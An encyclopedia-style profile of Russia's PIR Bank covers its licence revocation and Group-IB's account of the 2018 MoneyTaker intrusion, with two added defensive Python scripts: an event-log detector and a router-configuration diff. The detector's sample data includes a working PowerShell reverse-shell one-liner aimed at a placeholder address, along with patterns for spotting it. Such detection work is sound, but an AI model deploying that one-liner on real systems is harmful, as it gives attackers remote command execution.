Industrial and Investment Settlement Bank PIR Bank
Russia
Central Federal District of the Russian Federation
Moscow
121099, Novinsky Boulevard, 3, bldg. 1
Limited Liability Company Industrial and Investment Settlements Bank (PIR Bank LLC) is a universal Moscow-based credit institution operating under General Licence No. 2655 of the Central Bank of the Russian Federation. The bank began operations on 20 January 1994 and has been active in the Russian banking market for more than 22 years. It is a member of the ARB, the Moscow Banking Union, the VISA International payment system and the foreign exchange market section of MICEX, and participates in the deposit insurance system (certificate No. 284 of 9 December 2004).
PIR Bank has been operating in the financial services market since 1994 and offers its clients a wide range of financial services, including settlement and cash services, cash collection, lending, deposit operations, documentary operations, issuance and servicing of payment cards, individual safe deposit boxes, a Personal Manager service and other banking services.
2024: Former Deputy Chairman of the Board Andrei Serebrennikov sentenced to 4 years in prison for embezzlement of 57 million rubles
On August 14, 2024, the Presnensky District Court of Moscow found Andrei Serebrennikov, the former deputy chairman of the board of PIR Bank, guilty of embezzling more than 57 million rubles from the credit institution. He was sentenced to four years in prison.
2018
Central Bank revoked the license from PIR Bank
On 12 October 2018 the Bank of Russia revoked PIR Bank's banking licence, the regulator's press service reported. According to its reporting data, the credit institution ranked 296th in the Russian banking system by assets as of 1 October 2018.
"The activities of PIR Bank LLC revealed numerous violations of the legislation and regulations of the Bank of Russia in the field of countering the legalization (laundering) of proceeds from crime and the financing of terrorism (AML/CFT) in terms of the completeness and reliability of information sent to the authorized body, including on operations subject to mandatory control," the Central Bank noted.
PIR Bank LLC had long been on the Bank of Russia's radar in connection with dubious transit transactions. The volume of these transactions fell only as a result of restrictive measures applied by the regulator.
The Bank of Russia had repeatedly (four times in the last 12 months) applied supervisory measures to PIR Bank LLC, including twice restricting it from accepting deposits from the public.
Under these circumstances, the Bank of Russia decided to revoke PIR Bank LLC's banking licence.
PIR Bank LLC is a member of the deposit insurance system.
Group-IB: PIR Bank was attacked by the hacker group MoneyTaker
Group-IB, an international company specialising in the prevention of cyber attacks and the development of information security products, established that the MoneyTaker criminal group is behind the attack on the Russian PIR Bank and the attempt to steal several tens of millions of rubles. The incident occurred on 3 July via the AWS CBD (the automated workstation of a Bank of Russia client, through which the bank sends payment messages to the Central Bank's payment system). According to the bank, the funds were withdrawn by spreading them across plastic cards of individuals at 17 banks from the top 50; most of the money was cashed out on the night of the theft. The attackers then tried to entrench themselves in the bank's network to prepare subsequent attacks, but were discovered in time by Group-IB specialists.
"As part of the incident response, Group-IB specialists helped to establish the probable source of the attack as quickly as possible, reconstruct the chain of events and contain the problem. At the moment the bank is operating normally; all of Group-IB's recommendations are being applied and will be used in the bank's work in order to prevent such incidents in the future," said Olga Kolosova, Chairman of the Board of PIR Bank LLC.
After examining the infected workstations and servers of the financial institution, Group-IB forensic experts collected irrefutable digital evidence of the involvement of MoneyTaker hackers in the theft. In particular, the experts found tools that the MoneyTaker group had previously used in attacks on banks, malware that allows the incident to be unambiguously attributed, the IP addresses from which the malware was controlled, and the method used to penetrate the network itself. Recommendations on preventing such attacks were sent to financial organisations that are clients and partners of Group-IB, including the Central Bank of Russia. MoneyTaker is a criminal group specialising in targeted attacks on financial institutions; Group-IB experts uncovered it last December and published an analytical report, "MoneyTaker: a year and a half below the radar." Its main targets inside banks are card processing and interbank transfer systems (AWS CBD and SWIFT).
As Group-IB specialists established, the attack on PIR Bank began at the end of May 2018. The probable entry point was a compromised network device (a router) located in one of the bank's regional branches. Tunnels had been configured on the router that gave the attackers access to the bank's local network. Group-IB stressed that this method of entry is characteristic of MoneyTaker: the group has used the same scheme at least three times before in attacks on banks with regional branch networks.
To gain persistence in the bank's systems and automate some stages of the attack, MoneyTaker traditionally uses PowerShell scripts, a technique Group-IB described in detail in its December report. Having penetrated the bank's main network, the attackers gained access to the AWS CBD (automated workstation of the Bank of Russia client), generated payment orders and sent the money in several tranches on the fly to accounts prepared in advance.
On the morning of 4 July, having discovered numerous unauthorised transactions totalling several tens of millions of rubles, the bank's employees asked the regulator to urgently block the correspondent account and the electronic signature (ES) keys of the AWS CBD, but it was not possible to suspend all the transfers in time. Most of the stolen funds were transferred to several dozen cards at the largest Russian banks and immediately cashed out by the hackers' accomplices, money mules recruited for the final stage of withdrawing cash from ATMs.
To hamper incident response and the subsequent investigation, the attackers destroyed traces of their presence in a manner characteristic of MoneyTaker: on numerous computers the operating system logs and application logs were wiped and system files were deleted. Nevertheless, Group-IB forensic experts reconstructed the criminals' actions and tools step by step: launching services through PowerShell scripts to gain full control over selected workstations and servers with Meterpreter (Metasploit Framework), moving through the network over RDP, SMB, Dameware Mini Remote Control and Radmin, and so on.
In addition, the hackers left a number of so-called reverse shells on the servers: programs that connected out from the bank's network to the attackers' servers and waited for new commands, so that the attackers could return and regain access to the network. All of these were identified by Group-IB staff and removed by the bank's administrators.
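The two behaviours described in the last two paragraphs, clearing event logs and leaving PowerShell-based reverse shells that call home, both leave traces in Windows event records when command-line and service-install auditing is enabled. The following Python script is an added example, not code from this article or from Group-IB: it scans constructed event records for the relevant event IDs, decodes any `-EncodedCommand` payload (base64 over UTF-16LE, which is how PowerShell expects it) and flags scripts that open an outbound TCP client and hand the stream to `iex`. The event IDs are real Windows IDs; the hostnames, the address 10.0.0.5 and port 4444 in the sample records are placeholders.

```python
import base64
import re
from typing import Dict, List, Optional

# Windows event IDs used as indicators (the IDs are real; the records below are constructed):
#   1102  the Security log was cleared     (Security channel)
#   104   an event log was cleared         (System channel)
#   7045  a new service was installed      (System channel)
#   4688  a new process was created        (Security channel, needs command-line auditing)
LOG_CLEARED_IDS = {1102: "security log cleared", 104: "event log cleared"}
EXEC_IDS = {7045, 4688}

# PowerShell's -EncodedCommand switch and its accepted abbreviations, followed by base64.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand (base64 over UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def looks_like_reverse_shell(script: str) -> bool:
    """Heuristic: an outbound TCP client whose stream is handed to an evaluator (iex)."""
    s = script.lower()
    return "net.sockets.tcpclient" in s and ("iex" in s or "invoke-expression" in s)


def analyze(events: List[Dict]) -> List[Dict]:
    """One finding per suspicious record: a cleared log, or encoded PowerShell that looks like a reverse shell."""
    findings = []
    for ev in events:
        eid = ev["event_id"]
        if eid in LOG_CLEARED_IDS:
            findings.append({"host": ev["host"], "event_id": eid, "reason": LOG_CLEARED_IDS[eid]})
        elif eid in EXEC_IDS and "powershell" in ev.get("command", "").lower():
            cmd = ev["command"]
            script = decode_encoded_command(cmd)
            if script is None:
                continue  # plain (unencoded) command line: leave it to other rules
            if looks_like_reverse_shell(script):
                findings.append({"host": ev["host"], "event_id": eid, "reason": "encoded powershell reverse shell"})
            elif re.search(r"-(?:nop|w\s+hidden)\b", cmd, re.IGNORECASE):
                findings.append({"host": ev["host"], "event_id": eid, "reason": "hidden encoded powershell"})
    return findings


def _enc(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects it (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records. The one-liner is the common TCPClient/iex reverse-shell pattern;
# 10.0.0.5:4444 and the hostnames are placeholders.
REVERSE_SHELL = (
    "$c=New-Object Net.Sockets.TCPClient('10.0.0.5',4444);$s=$c.GetStream();"
    "[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){"
    "$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);iex $d}"
)
SAMPLE_EVENTS = [
    {"host": "ws-branch-07", "event_id": 1102, "command": ""},
    {"host": "srv-pay-02", "event_id": 7045,
     "command": "powershell.exe -nop -w hidden -enc " + _enc(REVERSE_SHELL)},
    {"host": "srv-backup-01", "event_id": 4688,
     "command": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "srv-backup-01", "event_id": 4688,
     "command": "powershell.exe -EncodedCommand " + _enc("Get-Date")},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['host']:14} event {f['event_id']:5}  {f['reason']}")
```

Run as-is it reports the cleared Security log on the branch workstation and the hidden encoded service on the payment server, and stays silent on the backup host, whose encoded `Get-Date` decodes to something harmless. In a real deployment the 1102/104 hits matter most: a cleared log on a host that also ran an encoded PowerShell service is exactly the sequence the paragraphs above describe, and the decoded payload gives the IP address and port to block at the perimeter.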
"Since the beginning of 2018 this is far from the first successful attack on a Russian bank that ended with money being withdrawn," said Valery Baulin, head of the Group-IB computer forensics laboratory. "We know of at least three such incidents, but cannot disclose details until the investigation is completed. As for the withdrawal schemes: each group specialising in targeted attacks - Cobalt, with and MoneyTaker (they are the most active in 2018) - has its own scheme, which depends on the amount and on the cash-out scenarios the hackers have available. You need to understand that attacks on the AWS CBD are difficult to carry out and are not frequent, since not everyone can work successfully on a machine with the AWS CBD. One of the largest attacks of this kind remains the 2016 incident, when MoneyTaker hackers withdrew about 120 million rubles using a self-written program of the same name."
The first MoneyTaker attack was recorded in the spring of 2016, when money was stolen from a US bank after the attackers gained access to FirstData's STAR card processing system. The hackers then lay low for almost four months and only in September 2016 attacked banks in Russia; this time their target was the AWS CBD, the Russian interbank transfer system. In total, in 2016 Group-IB recorded 10 MoneyTaker attacks in the United States, England and Russia. Since 2017 the geography of the attacks has narrowed to Russia and the United States. In 2018 we recorded two MoneyTaker attacks in Russia.
MoneyTaker has its own distinctive signature. The hackers try to stay unnoticed, use disposable infrastructure and fileless tools, and carefully cover the traces of their presence. They are distinguished by a specific toolset: for persistence the group uses the Metasploit and PowerShell Empire frameworks.
Clearly, MoneyTaker poses no less of a threat than the Cobalt group, which the Central Bank has named the main threat to Russian banks. In connection with the PIR Bank incident, Group-IB provided the security services of financial institutions with recommendations on minimising the danger posed by this group. Since in most successful MoneyTaker attacks the entry point was a router, the first things to check are that routers run current firmware, that their passwords cannot be brute-forced, and that any change to a router's configuration is detected quickly.
Group-IB's December report stated that by then MoneyTaker had carried out 16 attacks in the US, 3 on Russian banks and 1 on an IT company in the UK. In the United States the average damage from a single attack was $500,000; in Russia the average amount withdrawn was 72 million rubles. Besides money, the attackers steal documentation on interbank payment systems needed to prepare further attacks.
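The last of the recommendations above, quick detection of configuration changes on a router, can be automated by diffing each device's saved configuration against a known-good baseline and escalating changes in the section types an intruder needs. The Python below is an added example, not code from this article or from Group-IB, written for an IOS-style text configuration: it splits the configuration into top-level sections, reports sections that were added, removed or changed, and marks anything touching tunnel interfaces, local users, static routes, VTY lines or crypto settings as high severity, which covers the tunnel-on-a-branch-router entry technique described in the PIR Bank case. Both configurations are constructed; the hostname, addresses and credentials are placeholders.

```python
import hashlib
import re
from typing import Dict, List, Tuple

# Section headers whose change should alert immediately rather than wait for a daily report.
HIGH_RISK = (
    re.compile(r"^interface Tunnel", re.I),  # a new tunnel into the LAN: the entry technique above
    re.compile(r"^username ", re.I),         # local account added or changed
    re.compile(r"^ip route ", re.I),         # static route, e.g. LAN traffic steered through a tunnel
    re.compile(r"^line vty", re.I),          # remote management access
    re.compile(r"^crypto ", re.I),           # IPsec/IKE material
)


def parse_sections(config: str) -> Dict[str, Tuple[str, ...]]:
    """Split an IOS-style config into {header line: (indented child lines...)}.
    Comment ('!') and blank lines are ignored; a top-level line without children is a section with an empty body."""
    sections: Dict[str, Tuple[str, ...]] = {}
    header = None
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw[0].isspace() and header is not None:
            sections[header] = sections[header] + (raw.strip(),)
        else:
            header = raw.rstrip()
            sections.setdefault(header, ())
    return sections


def _finding(kind: str, header: str, body: Tuple[str, ...]) -> Dict:
    severity = "high" if any(p.search(header) for p in HIGH_RISK) else "info"
    return {"kind": kind, "section": header, "severity": severity, "body": list(body)}


def diff_configs(baseline: str, current: str) -> List[Dict]:
    """Report every top-level section that was added, removed or changed between baseline and current."""
    old, new = parse_sections(baseline), parse_sections(current)
    findings = []
    for hdr in sorted(set(old) | set(new)):
        if hdr not in old:
            findings.append(_finding("added", hdr, new[hdr]))
        elif hdr not in new:
            findings.append(_finding("removed", hdr, old[hdr]))
        elif old[hdr] != new[hdr]:
            findings.append(_finding("changed", hdr, new[hdr]))
    return findings


def config_fingerprint(config: str) -> str:
    """SHA-256 over the normalised sections, so comments and blank lines alone never trigger an alert."""
    norm = "\n".join(h + "\n" + "\n".join(b) for h, b in sorted(parse_sections(config).items()))
    return hashlib.sha256(norm.encode("utf-8")).hexdigest()


# Constructed baseline for a branch router (placeholders throughout).
BASELINE_CONFIG = """\
hostname branch-rtr-03
!
username admin privilege 15 secret 5 $1$placeholder$hash
!
interface GigabitEthernet0/0
 description WAN uplink
 ip address 198.51.100.2 255.255.255.252
!
interface GigabitEthernet0/1
 description branch LAN
 ip address 10.20.3.1 255.255.255.0
!
ip route 0.0.0.0 0.0.0.0 198.51.100.1
!
line vty 0 4
 transport input ssh
 login local
"""

# The same router after an intruder added a tunnel, a route to its far side and a privileged
# account, and an administrator made one harmless description change.
CURRENT_CONFIG = BASELINE_CONFIG.replace(
    " description WAN uplink\n", " description WAN uplink (provider ticket 4711)\n"
).replace(
    "username admin privilege 15 secret 5 $1$placeholder$hash\n",
    "username admin privilege 15 secret 5 $1$placeholder$hash\n"
    "username svc-tmp privilege 15 secret 0 placeholder\n",
).replace(
    "ip route 0.0.0.0 0.0.0.0 198.51.100.1\n",
    "interface Tunnel0\n"
    " ip address 10.99.0.2 255.255.255.252\n"
    " tunnel source GigabitEthernet0/0\n"
    " tunnel destination 203.0.113.10\n"
    "!\n"
    "ip route 0.0.0.0 0.0.0.0 198.51.100.1\n"
    "ip route 10.99.1.0 255.255.255.0 Tunnel0\n",
)

if __name__ == "__main__":
    for f in diff_configs(BASELINE_CONFIG, CURRENT_CONFIG):
        print(f"[{f['severity']:4}] {f['kind']:7} {f['section']}")
```

Against these two configurations the script reports the new `interface Tunnel0`, the new route via the tunnel and the new privileged user as high severity, and the description edit on the WAN interface as informational. The fingerprint is meant for a cheap poll from a collector: fetch the running configuration on a schedule, compare the hash with the one recorded when the baseline was approved, and only run the full diff when they differ. Keep the baselines off the router itself, since the paragraphs above describe an adversary who already controls the device.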
See also
- Bank losses from cybercrime
- Information security in banks
- Central Bank policy in the field of information protection in the banking system